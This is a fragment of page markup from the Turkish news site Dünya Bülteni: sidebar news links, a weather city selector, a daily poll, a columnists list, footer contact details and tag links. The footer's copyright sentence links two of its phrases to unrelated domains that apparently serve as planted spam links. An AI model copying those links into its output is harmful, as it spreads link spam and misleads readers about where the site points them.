    <a href="https://www.dunyabulteni.net/guncel/kara-yollarinda-durum-23-h549570.html" title="Kara yollarında durum" target="_blank">
      <img alt="Kara yollarında durum" class="img-fluid align-self-center lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/135x87/haberler/thumbs/2022/12/kara_yollarinda_durum_h549570_5d72c.jpg">
    </a>
    <div class="media-body align-self-center p-2">
      <h6>
        <a href="https://www.dunyabulteni.net/guncel/kara-yollarinda-durum-23-h549570.html" title="Kara yollarında durum" target="_blank">
          Kara yollarında durum        </a>
      </h6>
    </div>
  </div>
    <div class="media bg-white shadow-sm">
    <a href="https://www.dunyabulteni.net/guncel/akdeniz-de-deprem-oldu-3-h549566.html" title="Akdeniz&#039;de deprem oldu" target="_blank">
      <img alt="Akdeniz&#039;de deprem oldu" class="img-fluid align-self-center lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/135x87/haberler/thumbs/2022/12/akdeniz_de_deprem_oldu_h549566_4cabf.jpg">
    </a>
    <div class="media-body align-self-center p-2">
      <h6>
        <a href="https://www.dunyabulteni.net/guncel/akdeniz-de-deprem-oldu-3-h549566.html" title="Akdeniz&#039;de deprem oldu" target="_blank">
          Akdeniz&#039;de deprem oldu        </a>
      </h6>
    </div>
  </div>
  </div>
<!-- HAVA DURUMU -->
<div id="weather-widget" class="mb-3">
  <div class="card shadow-sm bg-info">
    <div class="card-body">
      <div class="row">
        <div class="col-6 weather-degree text-light" data-name="weather-degree">
          <i class="wi wi- text-warning"></i>         </div>
        <div class="col-6 weather-city pt-3">
          <div class="form-group text-center">
            <select data-name="weather-select" class="mb-1">
                              <option value="TUXX0061" >Adana</option>
                              <option value="9267066" >Adıyaman</option>
                              <option value="TUXX0046" >Afyon</option>
                              <option value="771" >Ağrı</option>
                              <option value="901" >Aksaray</option>
                              <option value="1412" >Amasya</option>
                              <option value="TUXX0002" >Ankara</option>
                              <option value="TUXX0004" >Antalya</option>
                              <option value="1885" >Ardahan</option>
                              <option value="9264197" >Artvin</option>
                              <option value="TUXX0051" >Aydın</option>
                              <option value="TUXX0041" >Balıkesir</option>
                              <option value="3037" >Bartın</option>
                              <option value="9261679" >Batman</option>
                              <option value="3200" >Bayburt</option>
                              <option value="3946" >Bilecik</option>
                              <option value="9260548" >Bingöl</option>
                              <option value="4045" >Bitlis</option>
                              <option value="TUXX0032" >Bolu</option>
                              <option value="5249" >Burdur</option>
                              <option value="TUXX0039" >Bursa</option>
                              <option value="TUXX0037" >Çanakkale</option>
                              <option value="9258078" >Çankırı</option>
                              <option value="TUXX0033" >Çorum</option>
                              <option value="8899" >Denizli</option>
                              <option value="TUXX0010" >Diyarbakır</option>
                              <option value="9252670" >Düzce</option>
                              <option value="TUXX0030" >Edirne</option>
                              <option value="TUXX0049" >Elazığ</option>
                              <option value="TUXX0035" >Erzincan</option>
                              <option value="TUXX0013" >Erzurum</option>
                              <option value="TUXX0040" >Eskişehir</option>
                              <option value="TUXX0055" >Gaziantep</option>
                              <option value="12125" >Giresun</option>
                              <option value="9248871" >Gümüşhane</option>
                              <option value="9255950" >Hakkari</option>
                              <option value="1694" >Hatay</option>
                              <option value="9245907" >Iğdır</option>
                              <option value="TUXX0052" >Isparta</option>
                              <option value="TUXX0014" selected>İstanbul</option>
                              <option value="TUXX0015" >İzmir</option>
                              <option value="15888" >K. Maraş</option>
                              <option value="9243604" >Karabük</option>
                              <option value="16174" >Karaman</option>
                              <option value="743952" >Kars</option>
                              <option value="16274" >Kastamonu</option>
                              <option value="16345" >Kayseri</option>
                              <option value="TUXX0019" >Kırıkkale</option>
                              <option value="16847" >Kırklareli</option>
                              <option value="TUXX0042" >Kırşehir</option>
                              <option value="16700" >Kilis</option>
                              <option value="TUXX0017" >Kocaeli</option>
                              <option value="TUXX0053" >Konya</option>
                              <option value="17542" >Kütahya</option>
                              <option value="19917" >Malatya</option>
                              <option value="20103" >Manisa</option>
                              <option value="20271" >Mardin</option>
                              <option value="14693" >Mersin</option>
                              <option value="TUXX0057" >Muğla</option>
                              <option value="TUXX0062" >Muş</option>
                              <option value="TUXX0065" >Nevşehir</option>
                              <option value="23341" >Niğde</option>
                              <option value="24553" >Ordu</option>
                              <option value="24703" >Osmaniye</option>
                              <option value="27911" >Rize</option>
                              <option value="TUXX0022" >Sakarya</option>
                              <option value="TUXX0023" >Samsun</option>
                              <option value="TUXX0050" >Siirt</option>
                              <option value="30965" >Sinop</option>
                              <option value="TUXX0034" >Sivas</option>
                              <option value="34552" >Şanlıurfa</option>
                              <option value="10034630" >Şırnak</option>
                              <option value="TUXX0031" >Tekirdağ</option>
                              <option value="33558" >Tokat</option>
                              <option value="TUXX0029" >Trabzon</option>
                              <option value="9226242" >Tunceli</option>
                              <option value="TUXX0045" >Uşak</option>
                              <option value="TUXX0043" >Van</option>
                              <option value="9250659" >Yalova</option>
                              <option value="37318" >Yozgat</option>
                              <option value="TUXX0028" >Zonguldak</option>
                              <option value="10208812" >Kıbrıs</option>
                              <option value="10700" >Famagusta</option>
                              <option value="23317" >Girne</option>
                              <option value="7261129" >Güzelyurt</option>
                              <option value="23317" >Lefkoşa</option>
                          </select>
          </div>
        </div>
        <div class="col-12">
          <div class="btn btn-outline-light btn-block text-uppercase text-center font-weight-light disabled" data-name="weather-desc"></div>
        </div>
      </div>
    </div>
  </div>
</div>
<!-- ANKET -->
<div id="survey" class="mb-3" data-survey="3">
  <div class="card shadow-sm">
    <div class="card-header bg-white">
      <span class="first-word widget-title text-info text-uppercase">Günün Anketi</span>
      <a class="btn btn-default btn-sm float-right text-uppercase" href="https://www.dunyabulteni.net/anketler.html" title="Anketler" target="_blank">
        Tümü      </a>
    </div>
    <div class="card-body">
            <h5 class="card-title">Türkiye Esed rejimiyle diyalog kurmalı mı?</h5>
              <div class="survey-options">
          <form id="survey_form_3">
            <input type="hidden" name="aid" value="3">
                          <div class="form-check m-1">
                <input class="form-check-input" type="radio" name="OY3" id="survey-option-3-6" value="6">
                <label class="form-check-label" for="survey-option-3-6">
                  Evet                </label>
              </div>
                          <div class="form-check m-1">
                <input class="form-check-input" type="radio" name="OY3" id="survey-option-3-7" value="7">
                <label class="form-check-label" for="survey-option-3-7">
                  Hayır                </label>
              </div>
                          <div class="form-check m-1">
                <input class="form-check-input" type="radio" name="OY3" id="survey-option-3-8" value="8">
                <label class="form-check-label" for="survey-option-3-8">
                  Asla                </label>
              </div>
                      </form>
          <small class="alert alert-warning mt-2" style="display:none;margin-bottom:0">Oy kullanmak için bir seçeneği işaretleyin!</small>
          <small class="alert alert-danger mt-2" style="display:none;margin-bottom:0">Bu anket için daha önce oy kullandınız!</small>
          <div class="alert alert-success mt-2" style="display:none;margin-bottom:0">Başarılı bir şekilde oyunuzu kullandınız.</div>
          <div class="col-auto mt-3">
            <button type="button" data-id="3" data-results="1" class="btn btn-success vote text-uppercase">Oy Kullan</button>
                          <button class="btn btn-warning text-uppercase results float-right" type="button" data-id="3">Sonuçlar</button>
                      </div>
        </div>
          </div>
  </div>
</div>
<!-- YAZARLAR -->
<div id="authors-sidebar" class="mb-3">
  <div class="card shadow-sm">
    <div class="card-header bg-white">
      <span class="first-word widget-title text-info text-uppercase">Köşe Yazarlarımız</span>
      <a class="btn btn-default btn-sm float-right text-uppercase" href="https://www.dunyabulteni.net/yazarlar" title="Köşe Yazarlarımız" target="_blank">Tümü</a>
    </div>
    <div class="card-body">
            <div class="media mb-2 pb-2 border-bottom">
        <a href="https://www.dunyabulteni.net/profil/2365/ahmet-akalin" title="Ahmet Akalın" target="_blank">
          <img alt="Ahmet Akalın" class="img-fluid align-self-center mr-3 rounded lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/75x75/yazarlar/advsdvsdvdsvd_1_1.jpg">
        </a>
        <div class="media-body align-self-center">
          <a class="text-info font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/profil/2365/ahmet-akalin" title="Ahmet Akalın" target="_blank">
            Ahmet Akalın          </a>
          <h6>
            <a href="https://www.dunyabulteni.net/ahiska-bir-gul-idi-gitti-makale,21581.html" title="Ahıska bir gül idi gitti" target="_blank">
              Ahıska bir gül idi gitti            </a>
          </h6>
        </div>
      </div>
            <div class="media mb-2 pb-2 border-bottom">
        <a href="https://www.dunyabulteni.net/profil/2339/osman-sahin" title="Osman Şahin" target="_blank">
          <img alt="Osman Şahin" class="img-fluid align-self-center mr-3 rounded lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/75x75/yazarlar/advsdvsdvdsvd_1.jpg">
        </a>
        <div class="media-body align-self-center">
          <a class="text-info font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/profil/2339/osman-sahin" title="Osman Şahin" target="_blank">
            Osman Şahin          </a>
          <h6>
            <a href="https://www.dunyabulteni.net/dere-yataklarina-ev-yapilmasi-caiz-mi-makale,21569.html" title="Dere yataklarına ev yapılması caiz mi?" target="_blank">
              Dere yataklarına ev yapılması caiz mi?            </a>
          </h6>
        </div>
      </div>
            <div class="media mb-2 pb-2 border-bottom">
        <a href="https://www.dunyabulteni.net/profil/2367/kamal-ilhamoglu-salimov" title="Kamal İlhamoğlu Salimov" target="_blank">
          <img alt="Kamal İlhamoğlu Salimov" class="img-fluid align-self-center mr-3 rounded lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/75x75/yazarlar/WhatsApp-Image-2022-05-15-at-17.16.43.jpeg">
        </a>
        <div class="media-body align-self-center">
          <a class="text-info font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/profil/2367/kamal-ilhamoglu-salimov" title="Kamal İlhamoğlu Salimov" target="_blank">
            Kamal İlhamoğlu Salimov          </a>
          <h6>
            <a href="https://www.dunyabulteni.net/cografyamiz-adina-daha-cok-konusacaklarimiz-var-makale,21563.html" title="Coğrafyamız adına daha çok konuşacaklarımız var…" target="_blank">
              Coğrafyamız adına daha çok konuşacaklarımız var…            </a>
          </h6>
        </div>
      </div>
            <div class="media mb-2 pb-2 border-bottom">
        <a href="https://www.dunyabulteni.net/profil/3195/rahmatullah-rasoly" title="Rahmatullah Rasoly" target="_blank">
          <img alt="Rahmatullah Rasoly" class="img-fluid align-self-center mr-3 rounded lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/75x75/yazarlar/wHT7ZM7Z_400x400.jpg">
        </a>
        <div class="media-body align-self-center">
          <a class="text-info font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/profil/3195/rahmatullah-rasoly" title="Rahmatullah Rasoly" target="_blank">
            Rahmatullah Rasoly          </a>
          <h6>
            <a href="https://www.dunyabulteni.net/afganistanin-manevi-sermayesinin-kaybi-makale,21547.html" title="Afganistan’ın manevi sermayesinin kaybı" target="_blank">
              Afganistan’ın manevi sermayesinin kaybı            </a>
          </h6>
        </div>
      </div>
            <div class="media mb-2 pb-2 border-bottom">
        <a href="https://www.dunyabulteni.net/profil/2348/mehmet-ozay" title="Mehmet Özay" target="_blank">
          <img alt="Mehmet Özay" class="img-fluid align-self-center mr-3 rounded lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/75x75/yazarlar/advdaadvdvdav.jpg">
        </a>
        <div class="media-body align-self-center">
          <a class="text-info font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/profil/2348/mehmet-ozay" title="Mehmet Özay" target="_blank">
            Mehmet Özay          </a>
          <h6>
            <a href="https://www.dunyabulteni.net/guney-korede-covid-19-surecinde-parlamento-secimleri-ve-sonuclarina-dair-makale,21449.html" title="Güney Kore’de Covid-19 sürecinde parlamento seçimleri ve sonuçlarına dair" target="_blank">
              Güney Kore’de Covid-19 sürecinde parlamento seçimleri ve sonuçlarına dair            </a>
          </h6>
        </div>
      </div>
            <div class="media">
        <a href="https://www.dunyabulteni.net/profil/2349/burak-caliskan" title="Burak Çalışkan" target="_blank">
          <img alt="Burak Çalışkan" class="img-fluid align-self-center mr-3 rounded lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/75x75/yazarlar/advsdvsdvdsvd.jpg">
        </a>
        <div class="media-body align-self-center">
          <a class="text-info font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/profil/2349/burak-caliskan" title="Burak Çalışkan" target="_blank">
            Burak Çalışkan          </a>
          <h6>
            <a href="https://www.dunyabulteni.net/vladimir-putin-donemi-rus-dis-politikasinin-donusumu-makale,21446.html" title="Vladimir Putin Dönemi Rus Dış Politikasının Dönüşümü" target="_blank">
              Vladimir Putin Dönemi Rus Dış Politikasının Dönüşümü            </a>
          </h6>
        </div>
      </div>
          </div>
  </div>
</div>
<!-- SAYFALAR -->
<div id="similar-news" class="mb-3">
  <div class="card shadow-sm">
    <div class="card-header bg-white">
      <span class="first-word widget-title text-info text-uppercase">Sayfalar</span>
      <a class="btn btn-default btn-sm float-right text-uppercase" href="https://www.dunyabulteni.net/sayfalar.html" title="Sayfalar" target="_blank">Tümü</a>
    </div>
    <div class="card-body">
            <div class="media bg-white shadow-sm mb-2">
        <div class="media-body align-self-center p-2">
          <h6>
            <a href="https://www.dunyabulteni.net/gizlilik-ve-kisisel-verilerin-korunmasi-politikasi-s2.html" title="GİZLİLİK VE KİŞİSEL VERİLERİN KORUNMASI POLİTİKASI" target="_blank">
              <i class="far fa-file-alt"></i> GİZLİLİK VE KİŞİSEL VERİLERİN KORUNMASI POLİTİKASI            </a>
          </h6>
        </div>
      </div>
            <div class="media bg-white shadow-sm mb-2">
        <div class="media-body align-self-center p-2">
          <h6>
            <a href="https://www.dunyabulteni.net/kullanim-kosullari-s3.html" title="KULLANIM KOŞULLARI" target="_blank">
              <i class="far fa-file-alt"></i> KULLANIM KOŞULLARI            </a>
          </h6>
        </div>
      </div>
            <div class="media bg-white shadow-sm mb-2">
        <div class="media-body align-self-center p-2">
          <h6>
            <a href="https://www.dunyabulteni.net/kisisel-verilerin-korunmasi-ve-islenmesi-hakkinda-aydinlatma-metni-s4.html" title="Kişisel Verilerin Korunması ve İşlenmesi Hakkında Aydınlatma Metni" target="_blank">
              <i class="far fa-file-alt"></i> Kişisel Verilerin Korunması ve İşlenmesi Hakkında Aydınlatma Metni            </a>
          </h6>
        </div>
      </div>
            <div class="media bg-white shadow-sm">
        <div class="media-body align-self-center p-2">
          <h6>
            <a href="https://www.dunyabulteni.net/cerez-politikamiz-s5.html" title="ÇEREZ POLİTİKAMIZ" target="_blank">
              <i class="far fa-file-alt"></i> ÇEREZ POLİTİKAMIZ            </a>
          </h6>
        </div>
      </div>
          </div>
  </div>
</div>
                </div>
                <!-- Sidebar bitti -->
            </div>
        </div>
            </main>
    <a id="back-to-top" class="btn btn-lg btn-light border rounded-circle" href="#" title="Yukarı Git"><i
            class="fa fa-chevron-up"></i></a>
    <style>
    .short-description a {
        color:#6c757d;
    }
</style>
<div id="footer" class="py-5 bg-dark">
    <div class="container">
        <div class="row">
            <div class="col-4 text-secondary">
                <div class="mb-3">
                    <img src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png"
                        data-src="https://www.dunyabulteni.net/images/banner/dunyabulteni_1.png" alt="Dünya Bülteni Haber Portalı"
                        class="img-fluid lazyload">
                </div>
                                <div class="short-description">Bu sitede yayınlanan <a href="https://guncelgirisi.com">tüm materyalin</a> her hakkı mahfuzdur. <a href="https://guncelbonus.org">Kaynak gösterilmeden</a> alıntılanamaz.</div>
                                <div class="title-line my-3 bg-warning w-25"></div>
                                <div class="mt-2">
                    <i class="fas fa-map-marker-alt text-warning"> </i>Fetih Mahallesi, Tahralı Sokak, Kavakyeli A Blok, No:7 D:25, Ataşehir/İstanbul                </div>
                                                <div class="mt-2">
                    <i class="fas fa-phone text-warning"> </i>0216 339 45 45                </div>
                                                <div class="mt-2">
                    OKUR HATTI: 0552 324 3890                </div>
                                                <div class="mt-2">
                    <i class="far fa-envelope text-warning"> </i><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="b5dcdbd3daf5d1c0dbccd4d7c0d9c1d0dbdc9bdbd0c1">[email&#160;protected]</a>                </div>
                                <div class="mt-4">
                                        <a class="btn btn-light btn-sm" href="https://www.facebook.com/dunyabulteni"
                        target="_blank" title="Facebook"><i class="fab fa-facebook-f text-primary"></i> </a>
                                                            <a class="btn btn-light btn-sm" href="https://twitter.com/@dunyabulteni" target="_blank"
                        title="Twitter"><i class="fab fa-twitter text-info"></i> </a>
                                                                                                </div>
            </div>
            <div class="col-4">
  <h5 class="first-word text-white text-uppercase">Güncel Haberler</h5>
  <div class="title-line mt-2 mb-3 bg-warning w-25"></div>
    <div class="media mb-3">
    <img class="img-fluid lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/105x68/haberler/2022/12/tbmm_baskani_6_nisan_dan_once_secim_karari_alinmasini_beklemiyorum_h549596_989c3.jpg" alt="TBMM Başkanı: &#039;6 Nisan&#039;dan önce seçim kararı alınmasını beklemiyorum&#039;" width="105">
    <div class="media-body p-3 align-self-center">
      <h6>
        <a href="https://www.dunyabulteni.net/guncel/tbmm-baskani-6-nisan-dan-once-secim-karari-alinmasini-h549596.html" title="TBMM Başkanı: &#039;6 Nisan&#039;dan önce seçim kararı alınmasını beklemiyorum&#039;" target="_blank" class="text-white-50">
          TBMM Başkanı: &#039;6 Nisan&#039;dan önce seçim kararı alınmasını beklemiyorum&#039;        </a>
      </h6>
    </div>
  </div>
    <div class="media mb-3">
    <img class="img-fluid lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/105x68/haberler/2022/12/kosova_daki_adem_jashari_havalimani_bomba_ihbari_nedeniyle_kapatildi_h549595_4a009.jpg" alt="Kosova&#039;daki Adem Jashari Havalimanı bomba ihbarı nedeniyle kapatıldı" width="105">
    <div class="media-body p-3 align-self-center">
      <h6>
        <a href="https://www.dunyabulteni.net/balkanlar/kosova-daki-adem-jashari-havalimani-bomba-ihbari-nedeniyle-kapatildi-h549595.html" title="Kosova&#039;daki Adem Jashari Havalimanı bomba ihbarı nedeniyle kapatıldı" target="_blank" class="text-white-50">
          Kosova&#039;daki Adem Jashari Havalimanı bomba ihbarı nedeniyle kapatıldı        </a>
      </h6>
    </div>
  </div>
    <div class="media mb-3">
    <img class="img-fluid lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/105x68/haberler/2022/12/1_milyon_istihdam_projesi_nde_kullanici_sayisi_1_milyonu_gecti_h549594_6f807.jpg" alt="1 Milyon İstihdam Projesi&#039;nde kullanıcı sayısı 1 milyonu geçti" width="105">
    <div class="media-body p-3 align-self-center">
      <h6>
        <a href="https://www.dunyabulteni.net/ekonomi-finans/1-milyon-istihdam-projesi-nde-kullanici-sayisi-1-milyonu-gecti-h549594.html" title="1 Milyon İstihdam Projesi&#039;nde kullanıcı sayısı 1 milyonu geçti" target="_blank" class="text-white-50">
          1 Milyon İstihdam Projesi&#039;nde kullanıcı sayısı 1 milyonu geçti        </a>
      </h6>
    </div>
  </div>
    <div class="media mb-3">
    <img class="img-fluid lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/105x68/haberler/2022/12/urdun_yahudi_yerlesimcilerin_dogu_kudus_te_hristiyanlarin_arazisine_baskinini_kinadi_h549593_6a22c.jpg" alt="Ürdün, Yahudi yerleşimcilerin Doğu Kudüs&#039;te Hristiyanların arazisine baskınını kınadı" width="105">
    <div class="media-body p-3 align-self-center">
      <h6>
        <a href="https://www.dunyabulteni.net/ortadogu/urdun-yahudi-yerlesimcilerin-dogu-kudus-te-hristiyanlarin-h549593.html" title="Ürdün, Yahudi yerleşimcilerin Doğu Kudüs&#039;te Hristiyanların arazisine baskınını kınadı" target="_blank" class="text-white-50">
          Ürdün, Yahudi yerleşimcilerin Doğu Kudüs&#039;te Hristiyanların arazisine baskınını kınadı        </a>
      </h6>
    </div>
  </div>
  </div>
                    </div>
        <div class="footer-tags text-center my-3">
      <a href="https://www.dunyabulteni.net/haberleri/ramazan" title="ramazan" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#ramazan</a>
      <a href="https://www.dunyabulteni.net/haberleri/yang%C4%B1n" title="yangın" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#yangın</a>
      <a href="https://www.dunyabulteni.net/haberleri/cumhurba%C5%9Fkan%C4%B1+erdo%C4%9Fan" title="cumhurbaşkanı erdoğan" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#cumhurbaşkanı erdoğan</a>
      <a href="https://www.dunyabulteni.net/haberleri/k%C4%B1rg%C4%B1zistan" title="kırgızistan" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#kırgızistan</a>
      <a href="https://www.dunyabulteni.net/haberleri/g%C3%B6steri" title="gösteri" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#gösteri</a>
      <a href="https://www.dunyabulteni.net/haberleri/a%C5%9F%C4%B1" title="aşı" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#aşı</a>
      <a href="https://www.dunyabulteni.net/haberleri/Joe+Biden" title="Joe Biden" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Joe Biden</a>
      <a href="https://www.dunyabulteni.net/haberleri/isve%C3%A7" title="isveç" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#isveç</a>
      <a href="https://www.dunyabulteni.net/haberleri/g%C3%B6zalt%C4%B1" title="gözaltı" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#gözaltı</a>
      <a href="https://www.dunyabulteni.net/haberleri/kar" title="kar" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#kar</a>
      <a href="https://www.dunyabulteni.net/haberleri/Mevl%C3%BCt+%C3%87avu%C5%9Fo%C4%9Flu" title="Mevlüt Çavuşoğlu" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Mevlüt Çavuşoğlu</a>
      <a href="https://www.dunyabulteni.net/haberleri/Donald+Trump" title="Donald Trump" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Donald Trump</a>
      <a href="https://www.dunyabulteni.net/haberleri/DEA%C5%9E" title="DEAŞ" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#DEAŞ</a>
      <a href="https://www.dunyabulteni.net/haberleri/ABD" title="ABD" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#ABD</a>
      <a href="https://www.dunyabulteni.net/haberleri/4" title="4" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#4</a>
      <a href="https://www.dunyabulteni.net/haberleri/Cerablus+operasyon" title="Cerablus operasyon" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Cerablus operasyon</a>
      <a href="https://www.dunyabulteni.net/haberleri/d%C3%BCnya" title="dünya" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#dünya</a>
      <a href="https://www.dunyabulteni.net/haberleri/salg%C4%B1n" title="salgın" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#salgın</a>
      <a href="https://www.dunyabulteni.net/haberleri/patlama" title="patlama" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#patlama</a>
      <a href="https://www.dunyabulteni.net/haberleri/virus" title="virus" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#virus</a>
  </div>
        <div class="text-center">
                        <a href="https://itunes.apple.com/tr/app/haber-sistemi/id1436304621" target="_blank" title="App Store">
                <img class="img-fluid lazyload rounded" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png"
                    data-src="https://www.dunyabulteni.net/_themes/hs-elegant/images/apple.png" alt="App Store" width="125">
            </a>
                                    <a href="https://play.google.com/store/apps/details?id=com.dunyabulteni.net" target="_blank" title="Google Play">
                <img class="img-fluid lazyload rounded" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png"
                    data-src="https://www.dunyabulteni.net/_themes/hs-elegant/images/google-play.png" alt="Google Play" width="125">
            </a>
                    </div>
    </div>
</div>
<div id="footer-copyright" class="bg-dark py-3">
  <div class="container text-white">
    <div class="row">
      <div class="col-auto">
        Copyright &copy;
        2022        <br/>Her hakkı saklıdır. Haber Yazılımı: <a href="https://www.tebilisim.com" title="haber yazılımı, haber scripti, haber sistemi" target="_blank" class="text-white">TE Bilişim</a>      </div>
      <div class="col text-right">

        <a class="text-white pl-2 ml-2" href="https://www.dunyabulteni.net/kullanim-kosullari-s3.html" target="_blank" title="Kullanım Koşulları">Kullanım Koşulları</a> |

                  <a class="text-white pl-2 ml-2 border-left" href="https://www.dunyabulteni.net/gizlilik-ve-kisisel-verilerin-korunmasi-politikasi-s2.html" target="_blank" title="Gizlilik Politikası">Gizlilik Politikası</a>
         |

        <a class="text-white pl-2 ml-2" href="https://www.dunyabulteni.net/kisisel-verilerin-korunmasi-ve-islenmesi-hakkinda-aydinlatma-metni-s4.html" target="_blank" title="Kişisel Verilerin Korunması ve İşlenmesi Hakkında Aydınlatma Metni">Kişisel Verilerin Korunması ve İşlenmesi Hakkında Aydınlatma Metni</a> |

        <a class="text-white pl-2 ml-2" href="https://www.dunyabulteni.net/cerez-politikamiz-s5.html" target="_blank" title="Çerez Politikamız">Çerez Politikamız</a> |

      
        <a class="text-white pl-2 ml-2" href="https://www.dunyabulteni.net/kunye.html" target="_blank" title="Künye">Künye</a>
        <a class="text-white pl-2 ml-2 border-left" href="https://www.dunyabulteni.net/iletisim.html" target="_blank" title="İletişim">İletişim</a>
        <a class="text-white pl-2 ml-2 border-left" target="_blank" href="https://www.dunyabulteni.net/rss/" target="_blank" title="RSS">RSS</a>
        <a class="text-white pl-2 ml-2 border-left" href="https://www.dunyabulteni.net/sitene-ekle.html" target="_blank" title="Sitene Ekle">Sitene Ekle</a>
      </div>
    </div>
  </div>
</div>
    <div id="search" class="position-fixed w-100 h-100">
  <div class="close">Kapat</div>
  <form action="https://www.dunyabulteni.net/" method="get" class="p-3 position-absolute">
    <h3 class="text-light pb-2">Sitede Ara</h3>
    <div class="form-row">
      <div class="col-10">
        <input type="hidden" name="m" value="arama">
        <input name="q" type="search" class="form-control form-control-lg" placeholder="Sitede aramak için bir kelime yazın ve Enter'a basın." required>
        <input type="hidden" name="auth" value="37fd7f0d72e22dcee167731362f5d1c7f8dd928c" />
      </div>
      <div class="col-2"><button type="submit" class="btn btn-primary btn-block btn-lg text-uppercase">Ara</button></div>
    </div>
        <div class="text-center my-3">
              <a href="https://www.dunyabulteni.net/haberleri/ramazan" title="ramazan" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#ramazan</a>
              <a href="https://www.dunyabulteni.net/haberleri/yang%C4%B1n" title="yangın" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#yangın</a>
              <a href="https://www.dunyabulteni.net/haberleri/cumhurba%C5%9Fkan%C4%B1+erdo%C4%9Fan" title="cumhurbaşkanı erdoğan" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#cumhurbaşkanı erdoğan</a>
              <a href="https://www.dunyabulteni.net/haberleri/k%C4%B1rg%C4%B1zistan" title="kırgızistan" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#kırgızistan</a>
              <a href="https://www.dunyabulteni.net/haberleri/g%C3%B6steri" title="gösteri" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#gösteri</a>
              <a href="https://www.dunyabulteni.net/haberleri/a%C5%9F%C4%B1" title="aşı" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#aşı</a>
              <a href="https://www.dunyabulteni.net/haberleri/Joe+Biden" title="Joe Biden" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Joe Biden</a>
              <a href="https://www.dunyabulteni.net/haberleri/isve%C3%A7" title="isveç" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#isveç</a>
              <a href="https://www.dunyabulteni.net/haberleri/g%C3%B6zalt%C4%B1" title="gözaltı" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#gözaltı</a>
              <a href="https://www.dunyabulteni.net/haberleri/kar" title="kar" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#kar</a>
              <a href="https://www.dunyabulteni.net/haberleri/Mevl%C3%BCt+%C3%87avu%C5%9Fo%C4%9Flu" title="Mevlüt Çavuşoğlu" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Mevlüt Çavuşoğlu</a>
              <a href="https://www.dunyabulteni.net/haberleri/Donald+Trump" title="Donald Trump" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Donald Trump</a>
              <a href="https://www.dunyabulteni.net/haberleri/DEA%C5%9E" title="DEAŞ" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#DEAŞ</a>
              <a href="https://www.dunyabulteni.net/haberleri/ABD" title="ABD" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#ABD</a>
              <a href="https://www.dunyabulteni.net/haberleri/4" title="4" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#4</a>
              <a href="https://www.dunyabulteni.net/haberleri/Cerablus+operasyon" title="Cerablus operasyon" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Cerablus operasyon</a>
              <a href="https://www.dunyabulteni.net/haberleri/d%C3%BCnya" title="dünya" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#dünya</a>
